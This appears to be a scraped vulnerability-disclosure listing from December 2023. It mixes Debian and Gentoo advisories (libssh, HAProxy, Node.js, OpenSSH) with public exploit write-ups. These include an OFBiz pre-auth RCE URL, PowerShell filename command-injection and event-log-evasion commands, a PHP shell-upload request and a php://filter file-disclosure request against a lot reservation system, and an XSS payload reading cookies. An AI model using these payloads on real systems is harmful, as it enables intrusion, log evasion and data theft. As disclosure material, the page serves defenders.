Apache OFBiz version 18.12.09 suffers from a pre-authentication remote code execution vulnerability.

    From: Jacques Le Roux <jleroux () apache org>Date: Mon, 04 Dec 2023 21:04:50 +0000Severity: moderateAffected versions:- Apache OFBiz before 18.12.10Description:Pre-auth RCE in Apache Ofbiz 18.12.09.It's due to XML-RPC no longer maintained still present.This issue affects Apache OFBiz: before 18.12.10. Users are recommended to upgrade to version 18.12.10This issue is being tracked as OFBIZ-12812 Credit:Siebene@ (finder)References:https://ofbiz.apache.org/download.htmlhttps://ofbiz.apache.org/security.htmlhttps://ofbiz.apache.org/release-notes-18.12.10.htmlhttps://ofbiz.apache.org/https://www.cve.org/CVERecord?id=CVE-2023-49070https://issues.apache.org/jira/browse/OFBIZ-12812-----Packet Storm NoteBelow is the proof of concept circulating on twitter:#POC: /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y

Apache OFBiz 18.12.09 Remote Code Execution

Debian Linux Security Advisory 5591-1 - Several vulnerabilities were discovered in libssh, a tiny C SSH library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5591-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 28, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libssh  
CVE ID         : CVE-2023-6004 CVE-2023-6918 CVE-2023-48795  
Debian Bug     : 1059004 1059059 1059061

Several vulnerabilities were discovered in libssh, a tiny C SSH library.

CVE-2023-6004

    It was reported that using the ProxyCommand or the ProxyJump feature  
    may allow an attacker to inject malicious code through specially  
    crafted hostnames.

CVE-2023-6918

    Jack Weinstein reported that missing checks for return values for  
    digests may result in denial of service (application crashes) or  
    usage of uninitialized memory.

CVE-2023-48795

    Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that  
    the SSH protocol is prone to a prefix truncation attack, known as  
    the "Terrapin attack". This attack allows a MITM attacker to effect  
    a limited break of the integrity of the early encrypted SSH  
    transport protocol by sending extra messages prior to the  
    commencement of encryption, and deleting an equal number of  
    consecutive messages immediately after encryption starts.

    Details can be found at https://terrapin-attack.com/

For the oldstable distribution (bullseye), these problems have been fixed  
in version 0.9.8-0+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 0.10.6-0+deb12u1.

We recommend that you upgrade your libssh packages.

For the detailed security status of libssh please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/libssh

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWNhadfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TR1w/+Mmnf9FXB5B5jQrYIpKB+7ksoXkhNRs92qXbM4SoMT9y8Kps2Ao4cyY7X  
8S8eyzwSF1Q847Pb2yfmjQqFwonbjca+uSsvVfITYl0lwZpvV8vIdtZNbQmFp9l9  
QTohScBg2xKrOZ/G9A3dih8vWAuvRwKq+5OqRyPt5cHGLZ9isyfF0ccsRvw41lbU  
Uu0sfOZetfsDIT1F2Fg3hQW4LzMA1n3yrRMQkOH9iJtdubAoyRE5MzVQktG5FpyG  
zcDD824k0vqAnKeulKhb8hf0vpkW2Ji1UDh3eFqoaYRppBFpNyOKSKP1m+pab6We  
aUVpIIZhFFIKovR/ZE4LSpTPb8ZLSkrpBSadtxQ1GzCq8EYTfTABVd1weaxaHhZZ  
ctrbXeY6EPwc2OQOOozCbyNERve1n5YqPiMfHEheDoaOkxMMB4fiNmXvveSq/eCN  
EhSzCdXCl4Z0SKk71gnXUw7G832p2He/mzkVJqZlUusCOWflrUXZa/fcEO+CQNvU  
ZRieJDmcXZDBlqC7HC9Khoonth5Gbst//UPL6zOYa2auJ+ftUZLvPeSGMrKdJ//0  
CNiG/pWEBggHku+wocggj9ie00hpAltuv6d3nVzLDSNntcDzZ2KpUS6f0Vo8jfm9  
PvJ4ymTrCDypWOVEmCPq4h68AFwv75q56lyhvPU0UxnW5524C/U=IV9+  
-----END PGP SIGNATURE-----

Debian Security Advisory 5591-1

Debian Linux Security Advisory 5590-1 - Several vulnerabilities were discovered in HAProxy, a fast and reliable load balancing reverse proxy, which can result in HTTP request smuggling or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5590-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 28, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : haproxyCVE ID         : CVE-2023-40225 CVE-2023-45539Debian Bug     : 1043502Several vulnerabilities were discovered in HAProxy, a fast and reliableload balancing reverse proxy, which can result in HTTP request smugglingor information disclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 2.2.9-2+deb11u6.For the stable distribution (bookworm), these problems have been fixed inversion 2.6.12-1+deb12u1.We recommend that you upgrade your haproxy packages.For the detailed security status of haproxy please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/haproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWNbchfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0S/3g//a2z//lFBvMI5Awp2Sf/l4QEzwYffDa6V62Yjcryhv/+gpuDSNleuXFxu7JuDQHZzUNi+Lv1HBO5F+393dwSGLDKrdFwOJO9NNknmja9cGZgJ69D1EjDxgRMTRvTHm5T4rM6J/bdGF4z5c12TRtxQqhg3K+Eymvkv3DtSfMu/Nc5ePF9RXhiMk2U3wj+7ftDLta54BkzksCrIajfbPHN7XeSGzzJ6CI+5v7aVXbllc74WUO5hF4c51Yev+TrewQWOLg41LVXpk8SlEeGK3YN+JlQf+PtwRFlMeAeghwpGnEhm+0h5d/mg54FeQ3f4Kp46WJcPBJONn+M9nJzn6ujP99vtr3QA+mmJ+OPAUn8RLwUuLUKQdsN1PtNQImJe5LMFUQhon53i4p9yN1jmJ19l1uKjI4IbZSp2NCYBzHNyP0gfKONrbhzfp0trWbxRCC+byMBNOSwiYdCw1Zo9602HP8AoOtJd9bVa4o74gC9a+pzieKqZX0hdjlfBynJHq2KgKsu/gTNctOexjCGlckQ3EGLqgXqLBF6tZpE1AR78bpyT+XTfYRaW7mwaaAxsFDDVH757EsOqBnjKORdjlm/nLspAzoqxYSZfongjivXhYkCb27+jMizFOfjjd454amXH8UGrqf8a32gCef6ph9CEkRkxoa5lxRZx55r7Ml0MsdkiRn-----END PGP SIGNATURE-----

Debian Security Advisory 5590-1

Gentoo Linux Security Advisory 202312-16 - Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to code execution. Versions greater than or equal to 0.10.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libssh: Multiple Vulnerabilities  
     Date: December 28, 2023  
     Bugs: #920291, #920724  
       ID: 202312-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in libssh, the worst of  
which could lead to code execution.

Background  
=========  
libssh is a multiplatform C library implementing the SSHv2 protocol on  
client and server side.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-libs/libssh  < 0.10.6      >= 0.10.6

Description  
==========  
Multiple vulnerabilities have been discovered in libssh. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libssh users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/libssh-0.10.6"

References  
=========  
[ 1 ] CVE-2023-6004  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6004  
[ 2 ] CVE-2023-48795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-48795

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-16

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-16

Gentoo Linux Security Advisory 202312-17 - Multiple vulnerabilities have been discovered in OpenSSH, the worst of which could lead to code execution. Versions greater than or equal to 9.6_p1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: OpenSSH: Multiple Vulnerabilities  
     Date: December 28, 2023  
     Bugs: #920292, #920722  
       ID: 202312-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in OpenSSH, the worst of  
which could lead to code execution.

Background  
=========  
OpenSSH is a free application suite consisting of server and clients  
that replace tools like telnet, rlogin, rcp and ftp with more secure  
versions offering additional functionality.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-misc/openssh  < 9.6_p1      >= 9.6_p1

Description  
==========  
Multiple vulnerabilities have been discovered in OpenSSH. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All OpenSSH users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/openssh-9.6_p1"

References  
=========  
[ 1 ] CVE-2023-48795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-48795  
[ 2 ] CVE-2023-51385  
      https://nvd.nist.gov/vuln/detail/CVE-2023-51385  
[ 3 ] CVE-2023-51385,CVE-2023-48795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-51385,CVE-2023-48795

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-17

Debian Linux Security Advisory 5589-1 - Multiple vulnerabilities were discovered in Node.js, which could result in HTTP request smuggling, bypass of policy feature checks, denial of service or loading of incorrect ICU data.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5589-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 27, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : nodejsCVE ID         : CVE-2023-23918 CVE-2023-23919 CVE-2023-23920 CVE-2023-30581                 CVE-2023-30588 CVE-2023-30589 CVE-2023-30590 CVE-2023-32002                 CVE-2023-32006 CVE-2023-32559 CVE-2023-38552 CVE-2023-39333Debian Bug     : 1031834 1039990 1050739 1054892Multiple vulnerabilities were discovered in Node.js, which could result inHTTP request smuggling, bypass of policy feature checks, denial of serviceor loading of incorrect ICU data.For the stable distribution (bookworm), these problems have been fixed inversion 18.19.0+dfsg-6~deb12u1. In addition node-undici has been updatedin version 5.15.0+dfsg1+~cs20.10.9.3-1+deb12u3 to ensure compatibilitywith the updated Node version.We recommend that you upgrade your nodejs packages.For the detailed security status of nodejs please refer toits security tracker page at:https://security-tracker.debian.org/tracker/nodejsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWMn90ACgkQEMKTtsN8TjZhAQ/+NzOxtDTy7SnnKGRNeFo7V1CJWQEH6smafl/mbmyiBA/+4v16bmNhvCgFaQvBCYxsAeCHj+gqY+lesaF1WP4cAz1wewaEAr/Z7oMQ7z+2b7xT7tcCtnN+n+W2elN0Jok+KlNtaI/WD9diyCTHubCf6/Yv1Qbzw0ojl+0RC+J199Kka3yB156BeZslbWnCRRWfbnARLWJj1nKgggAoEcoclFhvY/2tkKzgrDEvRHGPKW9vNGWB0J4huZd49px9O3BhOVpmFzyI19hv5ukVsvgUcJsWfWAtKmW0t9YGX/b7dl2lz7ryhuGXnutA+oZ39sz5E9mOcWgBkbMkerVl9VN33QcZWWu3QxxRBMTkvvZui04p8c4YTYdhdagUcRTGqKioJFeStboCk8zurcaHGZet6ozRHty0AmGAKCFjFNPtwJAVtdJFdprP9iPEKe+o+piDqzXBeFZ/FRpd7GZQG12iYjPJ/dy7mVU/L3IRe3IO40qWgSy0fvDOLJ6kfEEMKwUtZaUebgFFbCI7AbPbK65nHyl0kAwDhx+ui1taHY4SrKYrxSeGlVYxHbBAOOFnxN1xofl7N+rCHwZCKjmvMOjdwkKNDX+Ib5wxL6MTOW0u/2muFwkcnFWuTW8gX2o+YfVkCqHhdAhaSx1mFmzL4HKGoXMv5zjfwtThdl9VDIw3CxM=TZEm-----END PGP SIGNATURE-----

Debian Security Advisory 5589-1

Prior work from this researcher disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames. This research builds on their PSTrojanFile work, adding a PS command line single quote bypass and PS event logging failure. On Windows CL tab, completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution. However, if the filename got wrapped in single quotes it failed, that is until now.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

 [Vendor]  
www.microsoft.com

[Product]  
Microsoft Windows PowerShell

Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.

[Vulnerability Type]  
PowerShell Single Quote Code Execution / Event Log Bypass

[CVE Reference]  
N/A

[Security Issue]  
In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.  
This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure.  
On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution.  
However, if the filename gets wrapped in single quotes it failed, that is until now.

[Single Quote Code Exec Bypass]  
Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename.  
The trailing semicolon ";"  delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated.

Take the following three test cases using Defender API which takes a specially crafted filename.  
C:\>powershell Set-ProcessMitigation -PolicyFilePath  "Test;saps DOOM;.xml"

1) Double quotes OK  
"Test;saps DOOM;.xml" 

2) Single quotes FAILS  
'Test;saps DOOM;.xml'

3) Single quotes BYPASS  
'Test&DOOM;.xml'

PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands.  
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here  
and that it also excludes the .EXE portion in that filename.

[PS Event Log Bypass]  
On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes.  
However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log.  
Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed.

Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)  
C:\>powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating.

[PS Log ID 403 Snippet]  
Engine state is changed from Available to Stopped. 

Details:   
  NewEngineState=Stopped  
  PreviousEngineState=Available

  SequenceNumber=25

  HostName=ConsoleHost  
  HostVersion=5.1.19041.1682  
  HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0  
  HostApplication=powershell get-filehash 'Infected  
  EngineVersion=5.1.19041.1682

[Exploit/POC]  
powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Run some malware plus bypass logging of true file name:  
C:\Users\gg\Downloads>powershell get-filehash  'Infected&Malware;.zip'  -algorithm  md5  
PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename.

Defender Anti-Malware API:  
powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Call ping cmd using double "&":  
C:\>powershell Get-Filehash  'powerfail&ping 8.8.8.8&.txt'  -algorithm  md5

Call a Windows cmd to Logoff the victim:  
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'

We have options:

A) to call commands use double "&" --> 'virus&logoff&test.zip'  
B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'

[References]  
https://github.com/hyp3rlinx/PSTrojanFile  
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt  
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt

[Network Access]  
Local

[Severity]  
High

[Disclosure Timeline]  
Vendor Notification: circa 2019  
December 27, 2023 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Windows PowerShell Code Execution / Event Log Bypass

Lot Reservation Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server.Proof of Concept:-(HTTP POST Request)POST /lot/admin/ajax.php?action=save_division HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027Content-Length: 606Origin: http://192.168.150.228Connection: closeReferer: http://192.168.150.228/lot/admin/index.php?page=divisions-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="id"-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="name"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="description"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="img"; filename="phpinfo.php"Content-Type: application/x-php<?php phpinfo() ?>-----------------------------217984066236596965684247013027--Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.

Lot Reservation Management System 1.0 Shell Upload

Lot Reservation Management System version 1.0 suffers from a file disclosure vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario.Proof of Concept:-(HTTP POST Request)GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9snUpgrade-Insecure-Requests: 1The same can be achieved by removing the PHPSESSID cookie as below:-GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1The file requested will be returned in base64 format in returned HTTP response.The attack can also be used to traverse directories to return files outside the web root.GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1This will return test.php file in the D:\ directory.

Lot Reservation Management System 1.0 File Disclosure

WhatACart version 2.0.7 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS# Date: 2023-12-27# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://whatacart.com# Version: 2.0.7# Tested on: https://whatacart.com/demo1 ) Go to this page : https://demo.whatacart.com/2 ) Write search field this payload : <sVg/onLy=1 onLoaD=confirm(1)//3 ) You will bee alert button : https://demo.whatacart.com/site/default/search?keyword=%3CsVg%2FonLy%3D1+onLoaD%3Dconfirm(document.cookie)%2F%2F&navsearch=